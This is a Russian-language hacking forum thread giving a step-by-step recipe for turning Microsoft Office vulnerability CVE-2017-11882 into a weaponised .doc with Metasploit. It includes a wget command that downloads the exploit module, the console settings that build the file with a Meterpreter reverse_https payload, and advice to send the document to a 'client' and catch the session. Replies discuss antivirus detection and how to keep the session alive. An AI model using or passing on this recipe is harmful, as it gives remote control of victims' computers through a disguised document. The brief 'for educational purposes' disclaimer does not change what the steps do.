![]() |
Добрый день.
Один доллар (@OneDollar)показал пример эксплуатации уязвимости через Empire Powershell CVE-2017-11882 или Взлом с помощью безобидного документа Мы рассмотрим альтернативный вариант через Metasploit: Скачаем и перенесём експлоит Код: Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rbКод: Код:
service postgresql startКод: Код:
infoИз описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности? Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой Код: Код:
set FILENAME /root/exp.docДобавляем пейлоад и запускаем Код: Код:
set payload windows/meterpreter/reverse_httpsБерём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы). Запускаем, ловим сессию. https://forum.antichat.xyz/attachments/4790325/2.png AV так же не стоит на месте https://nodistribute.com/result/BUZqx1mACKldLr3 На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =) Информация дана для ознакомления, спасибо за внимание) Альтернативный вариант пост эксплуатации через Empire Powershell CVE-2017-11882 или Взлом с помощью безобидного документа |
Test - windows defender with last updates \ Windows Office unpatched -
Дефендер палит нагрузку но уже после выполнения через memory corruption. Соответственно сессию создаст. Хотя сделает вид что запалил. |
За всё время тестов любого ПО я понял, что сессия meterpreter странный предмет, вроде и создана, а вроде и нет =)
|
Цитата:
Сессия активна. |
Windows 8.1, Windows 10 - Все Last Update, дефендер уничтожает полезную нагрузку.
|
Цитата:
|
Цитата:
Выходишь в основное меню Код: Код:
mainhttps://forum.antichat.xyz/attachments/4790617/2017.png |
При добавлении текста в документ сессия не поднимается. Office 2013. Кто-нибудь сталкивался?
|
Цитата:
ну ничего) пройдёт неделька, другая обязательно появится решение) |
Цитата:
|
| Время: 03:39 |